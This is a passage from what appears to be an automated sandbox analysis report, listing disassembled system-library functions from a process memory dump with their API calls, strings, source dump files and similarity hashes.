                                                                                                                            • RtlEnterCriticalSection.1105(6B2C70A0,-00000054,?,00000000,-00000054,?,6B235D18), ref: 6B25EA52
                                                                                                                            • DbgPrint.1105(AVRF: AVrfDllUnloadNotification called for a provider (%p) ,-00000054,6B2C70A0,-00000054,?,00000000,-00000054,?,6B235D18), ref: 6B25EA69
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C70A0,6B2C70A0,-00000054,?,00000000,-00000054,?,6B235D18), ref: 6B25EAB0
                                                                                                                            Strings
                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 6B25EA64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeavePrint
                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                            • API String ID: 1203512206-702105204
                                                                                                                            • Opcode ID: c628056658011cd03bbb337c4fbdb83a64dc4202525324bf9dcc8bd73558a9b8
                                                                                                                            • Instruction ID: 34124d2dfe7a48a40878e4a4a4b1cb2311696012171653de22d2c780c20ea9ad
                                                                                                                            • Opcode Fuzzy Hash: c628056658011cd03bbb337c4fbdb83a64dc4202525324bf9dcc8bd73558a9b8
                                                                                                                            • Instruction Fuzzy Hash: A111E53326460DEBDB90EF35CCC9A9B77FAFF89264B100159E40647590CB28AC55C7A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FE090, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlWow64EnableFsRedirectionEx.1105(6B2C7B60,6B2C7B60,6B1FDFDF,?,00000000,6B2C7B60,6B2AFE18,00000028), ref: 6B1FE0A6
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C7B60,6B1FDFDF,?,00000000,6B2C7B60,6B2AFE18,00000028), ref: 6B1FE0B7
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C7B60,6B2C7B60,6B1FDFDF,?,00000000,6B2C7B60,6B2AFE18,00000028), ref: 6B1FE0DC
                                                                                                                            • ZwSetEvent.1105(00000000,6B2C7B60,6B2C7B60,6B1FDFDF,?,00000000,6B2C7B60,6B2AFE18,00000028), ref: 6B1FE0EF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnableEnterEventLeaveRedirectionWow64
                                                                                                                            • String ID: `{,k
                                                                                                                            • API String ID: 355146318-2711059664
                                                                                                                            • Opcode ID: 2c1adb9f63cdef4919a1f4fae28fd899d187a7aa2e83233ff5f0d32917f8c1fb
                                                                                                                            • Instruction ID: 2d2462bbc4cb14d64e650522ecc156dcc6ee8d0822c347103cb3f3b3e799c7fb
                                                                                                                            • Opcode Fuzzy Hash: 2c1adb9f63cdef4919a1f4fae28fd899d187a7aa2e83233ff5f0d32917f8c1fb
                                                                                                                            • Instruction Fuzzy Hash: 6301D1B1E55148BEEF11DA75C884F8E7BF9EF16319F0001A5E00063264C33D8A82C732
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FB944, Relevance: 7.7, APIs: 5, Instructions: 166nativetimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(00000000,?,00002710,00000000,?,?,?), ref: 6B1FB9A5
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,00002710,00000000,?,?,?), ref: 6B1FBA9C
                                                                                                                            • ZwSetTimer2.1105(00000000,?,00000000,?,00000000,?,00002710,00000000,?,?,?), ref: 6B1FBAC6
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?), ref: 6B1FBAE9
                                                                                                                            • ZwCancelTimer2.1105(00000000,00000000,?,?,?), ref: 6B1FBB03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSessionTimer2$CancelUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1220516486-0
                                                                                                                            • Opcode ID: 8d2f1440e47ec600ba2984eda6e4f40d7e8f54f95de34e628e693b6f287b86b2
                                                                                                                            • Instruction ID: ea6446d3efdac7bbb0c62586260aa28ccb227d637d3b54d172960ab96e6e8f4b
                                                                                                                            • Opcode Fuzzy Hash: 8d2f1440e47ec600ba2984eda6e4f40d7e8f54f95de34e628e693b6f287b86b2
                                                                                                                            • Instruction Fuzzy Hash: CD5157B0A08345DFC710CF29C08091BBBF9FB89754F1589AEE59987354D738E845CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FDBE9, Relevance: 7.6, APIs: 5, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 6B1FDD0B
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 6B1FDD2D
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000000,00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 6B1FDD46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3179239776-0
                                                                                                                            • Opcode ID: f2001fa4071537226893f6ebb1bcdd223c67def868f6134f02779eabc094838b
                                                                                                                            • Instruction ID: 697dd0ba50c7e760bf52a587228ab82e9e18f1ff4b948c5fa333d82a7ba36d0f
                                                                                                                            • Opcode Fuzzy Hash: f2001fa4071537226893f6ebb1bcdd223c67def868f6134f02779eabc094838b
                                                                                                                            • Instruction Fuzzy Hash: C451BF71E41615EFCB14CF68C480AAEBBF9BB89314F21819AD558EB344DB38A945CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D9100, Relevance: 7.6, APIs: 5, Instructions: 141nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,6B2AF6E8,0000002C,6B22E530,00000000,?,6B2B01C0,00000010,6B2A810C,00000000,00000000,00000000,00000000,6B2C86C4,6B2C86C4,00000008), ref: 6B1D9158
                                                                                                                            • ZwShutdownWorkerFactory.1105(?,?), ref: 6B1D9182
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D91C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AcquireCurrentExclusiveFactoryLockServiceSessionShutdownWorker
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1345183298-0
                                                                                                                            • Opcode ID: 9bf0aaaa685fb82ca552ac69effe7a0083fc70081886f849a19ce29e6afa152c
                                                                                                                            • Instruction ID: de42ef25711e9f8ae932b7cbbe9f517745acbee6744ddc2acb962ffc4c9684f4
                                                                                                                            • Opcode Fuzzy Hash: 9bf0aaaa685fb82ca552ac69effe7a0083fc70081886f849a19ce29e6afa152c
                                                                                                                            • Instruction Fuzzy Hash: C251E1B1E04659EFDB11CF28C4E8B9DBBF1BB597A5F108299C414AB282C33C9940CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2619C8, Relevance: 7.6, APIs: 5, Instructions: 107nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwCreateSection.1105(?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6B261A54
                                                                                                                            • ZwMapViewOfSection.1105(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004,08000000), ref: 6B261A74
                                                                                                                            • memset.1105(?,00000000,000000F0,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?), ref: 6B261A88
                                                                                                                            • ZwUnmapViewOfSection.1105(000000FF,?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6B261AB8
                                                                                                                            • ZwClose.1105(?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6B261AC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$CloseCreateUnmapmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 788617167-0
                                                                                                                            • Opcode ID: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
                                                                                                                            • Instruction ID: c7e2dd71e7395e6e83785382e9496a5853ae96fdf277cb42abf1efe704d2c342
                                                                                                                            • Opcode Fuzzy Hash: 77c0bd51e630a667eaba0cead26d1e37344295029b98cca860612fa6308b154e
                                                                                                                            • Instruction Fuzzy Hash: 09312EB1E0121DABDB10CF99C881EDEFBF9AF85755F10416AE910E7290D7745E81CAA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3880, Relevance: 7.6, APIs: 5, Instructions: 97memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • TpSetWaitEx.1105(000000FF,?,00000000,00000000), ref: 6B1D38B7
                                                                                                                              • Part of subcall function 6B1FECE0: RtlAcquireSRWLockExclusive.1105(?,00000000,00000000), ref: 6B1FED2C
                                                                                                                              • Part of subcall function 6B1FECE0: RtlReleaseSRWLockExclusive.1105(?,00000000,00000000,?,00000000,00000000), ref: 6B1FED90
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00001030,00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000,00000000), ref: 6B1D38D1
                                                                                                                            • ZwGetCompleteWnfStateSubscription.1105(00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000,00000000), ref: 6B1D38F0
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,?,?,00000000,00000000,00001030,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6B1D3914
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveHeapLock$AcquireAllocateCompleteFreeReleaseStateSubscriptionWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2233382-0
                                                                                                                            • Opcode ID: cc15128617f7117afae469feec18505f89bf2ec93621416970dd24353b46d060
                                                                                                                            • Instruction ID: 68e11936772d2edb369831bb6189447e7adea2e70a5eeac6e0cde3972e644e81
                                                                                                                            • Opcode Fuzzy Hash: cc15128617f7117afae469feec18505f89bf2ec93621416970dd24353b46d060
                                                                                                                            • Instruction Fuzzy Hash: DB31AF32E40219BFDB20CEA9D880B9EB7F9EB09750F114566E914E7290D7389E02CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4A20, Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D4A2A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?), ref: 6B1D4AB3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentFreeHeapServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1159841122-0
                                                                                                                            • Opcode ID: 28ce19d3054bd062282b951aaee458c73be122b6f49b5e18b2bbe3d9930223d1
                                                                                                                            • Instruction ID: 8f9edbfe5a53f91b010f33e56b6cae21b39479515f5ec425d9bd3909ea0d6c2b
                                                                                                                            • Opcode Fuzzy Hash: 28ce19d3054bd062282b951aaee458c73be122b6f49b5e18b2bbe3d9930223d1
                                                                                                                            • Instruction Fuzzy Hash: 35216830544A05EFC7208B3AD890F1777F5EB45725F204769D1574A5E0EB3CE841CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E28AE, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,?,6B2C84D8,6B1E0924,6B2C84D8,?,6B2C84D8,?,00000000,?,?,?,6B1E087C,?,?,?), ref: 6B1E28B3
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C5350), ref: 6B1E28DA
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(6B2C5350), ref: 6B1E28E1
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2376AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$CriticalEnterSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1555030633-0
                                                                                                                            • Opcode ID: 9a879889a572be9c3d2f656147fdd14d24c3ed59c8cc60019acb024324ec1591
                                                                                                                            • Instruction ID: 8b51d77963a81b1e1936db3ccd896fb937c8caf31d974802a23a62e80554e4dd
                                                                                                                            • Opcode Fuzzy Hash: 9a879889a572be9c3d2f656147fdd14d24c3ed59c8cc60019acb024324ec1591
                                                                                                                            • Instruction Fuzzy Hash: F0212971645A96EBF712477CCCA4F1037D8AB45B38F2503A1E9309B6F1DB6CD882C661
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF150, Relevance: 7.6, APIs: 5, Instructions: 59nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFormatCurrentUserKeyPath.1105(?,02000000,?,00000000), ref: 6B1DF15F
                                                                                                                              • Part of subcall function 6B1EA3E0: ZwQueryInformationToken.1105(000000FA,00000001,?,00000050,?,?), ref: 6B1EA404
                                                                                                                              • Part of subcall function 6B1EA3E0: RtlLengthSidAsUnicodeString.1105(?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA414
                                                                                                                              • Part of subcall function 6B1EA3E0: RtlAppendUnicodeToString.1105(?,\REGISTRY\USER\,?,02000000,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA443
                                                                                                                              • Part of subcall function 6B1EA3E0: RtlConvertSidToUnicodeString.1105(?,?,00000000,?,\REGISTRY\USER\,?,02000000,?,?,000000FA,00000001,?,00000050,?,?), ref: 6B1EA469
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,?,?,02000000,?,00000000), ref: 6B1DF19D
                                                                                                                              • Part of subcall function 6B1F2400: RtlDeleteBoundaryDescriptor.1105(?,00000000,?,6B268405,?,?,?,00000018,00000000,00000000,00000000,00000001,?,?,00000001,?), ref: 6B1F2412
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,02000000,?,00000000), ref: 6B1DF192
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$AppendBoundaryConvertCurrentDeleteDescriptorFormatFreeInformationInitializeLengthOpenPathQueryThunkTokenUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1101908438-0
                                                                                                                            • Opcode ID: 2feeeac9456432c14fa1c0c4412bd2ba366e1a5361366c7b10222d950d5204ba
                                                                                                                            • Instruction ID: 457b500848a30cd009735e91ec9f82791a284e0fa01bc99955ac1b15d37c1648
                                                                                                                            • Opcode Fuzzy Hash: 2feeeac9456432c14fa1c0c4412bd2ba366e1a5361366c7b10222d950d5204ba
                                                                                                                            • Instruction Fuzzy Hash: 3311B4B2C0025DABDF11DFA6C8858EFFBF9FB88254F014166E914A7200D7399A55CBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2012BD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,?,-00000001,?,?,?,6B20127D,?,00000000,?,6B22FC21,00000000,00000000), ref: 6B201331
                                                                                                                            • memcpy.1105(00000000,?,?,?,00000000,?,?,-00000001,?,?,?,6B20127D,?,00000000,?,6B22FC21), ref: 6B201350
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeapmemcpy
                                                                                                                            • String ID: `f,k
                                                                                                                            • API String ID: 1925790395-3043577075
                                                                                                                            • Opcode ID: 26c825d775b753bb56ad1eafa992601add04caf995a447a01d31fc2f4d47ee37
                                                                                                                            • Instruction ID: 1f60dd906aba31361554cb3879264194b6dbb32b46b104f0f62525b16b3228be
                                                                                                                            • Opcode Fuzzy Hash: 26c825d775b753bb56ad1eafa992601add04caf995a447a01d31fc2f4d47ee37
                                                                                                                            • Instruction Fuzzy Hash: 88218B71600615AFD720CF68C881F6AB3E9FF44755F10846DE5AEC7651DF38A880CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20D4B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000000,?,?,?,00000234,00000000,00000000,00000000,?,6B20C8DC,0000000C,?), ref: 6B24B08F
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx,RtlpInitializeAssemblyStorageMap,00000000,?,?,00000234,00000000,00000000,00000000,?,6B20C8DC,0000000C,?), ref: 6B24B0C0
                                                                                                                            Strings
                                                                                                                            • RtlpInitializeAssemblyStorageMap, xrefs: 6B24B0B2
                                                                                                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 6B24B0B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeapPrint
                                                                                                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                            • API String ID: 3766636288-2653619699
                                                                                                                            • Opcode ID: 364c703b591762cc0d89df02a00de449250c9193bed94f8a1563c4b90e39340d
                                                                                                                            • Instruction ID: 231d1a5fad2ff46125016590a4a7e2e73b08b19705205015e78a734eac612187
                                                                                                                            • Opcode Fuzzy Hash: 364c703b591762cc0d89df02a00de449250c9193bed94f8a1563c4b90e39340d
                                                                                                                            • Instruction Fuzzy Hash: 77113632B8121DBBE718CA9CCDC1F5B72E99B84B55F108069BE049B280EB78DD0087A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DA63B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,?,-00000001,?,6B2012AD,?,00000000,?,6B22FC21,00000000,00000000), ref: 6B234314
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID: @f,k
                                                                                                                            • API String ID: 1279760036-358343629
                                                                                                                            • Opcode ID: 5c8ec90474e8b9e7fe0d4c8e32ddd5aa9ea274efe90b95de127bfc511086745f
                                                                                                                            • Instruction ID: 5afc18d0319dca39cc72f2ea4bdf2c3fc069500e954c7813d3a349de65401f1d
                                                                                                                            • Opcode Fuzzy Hash: 5c8ec90474e8b9e7fe0d4c8e32ddd5aa9ea274efe90b95de127bfc511086745f
                                                                                                                            • Instruction Fuzzy Hash: 51113A770A0551EACBA58F2AC886B3133E8FB46B55B200224E70CDB291D739C841C324
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B26176C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwOpenEvent.1105(00000568,00100001,?,?,00000000), ref: 6B2617B5
                                                                                                                            • ZwWaitForSingleObject.1105(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6B2617E1
                                                                                                                            • ZwClose.1105(00000568,00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6B2617EB
                                                                                                                            Strings
                                                                                                                            • \KernelObjects\SystemErrorPortReady, xrefs: 6B26178B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventObjectOpenSingleWait
                                                                                                                            • String ID: \KernelObjects\SystemErrorPortReady
                                                                                                                            • API String ID: 2739627308-2278496901
                                                                                                                            • Opcode ID: 05f47104e1f4c275d82dfc727f43858ac4108f3d58098a313804270c05dc82e4
                                                                                                                            • Instruction ID: 9c2255221b1fb289119c065c20f33081ff5fc9c21efce5b4aac54b24124a85d7
                                                                                                                            • Opcode Fuzzy Hash: 05f47104e1f4c275d82dfc727f43858ac4108f3d58098a313804270c05dc82e4
                                                                                                                            • Instruction Fuzzy Hash: 07117075D1022CABCB10CFA99841AEEFBF8EF89250F10416BEA14F3290E7745A05CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D429E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51librarynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\DllNXOptions,?,?,00000000), ref: 6B1D42C7
                                                                                                                              • Part of subcall function 6B210F48: ZwOpenKey.1105(?,?,00000018), ref: 6B211015
                                                                                                                            • ZwClose.1105(?,?,?,?,\DllNXOptions,?,?,00000000), ref: 6B23068E
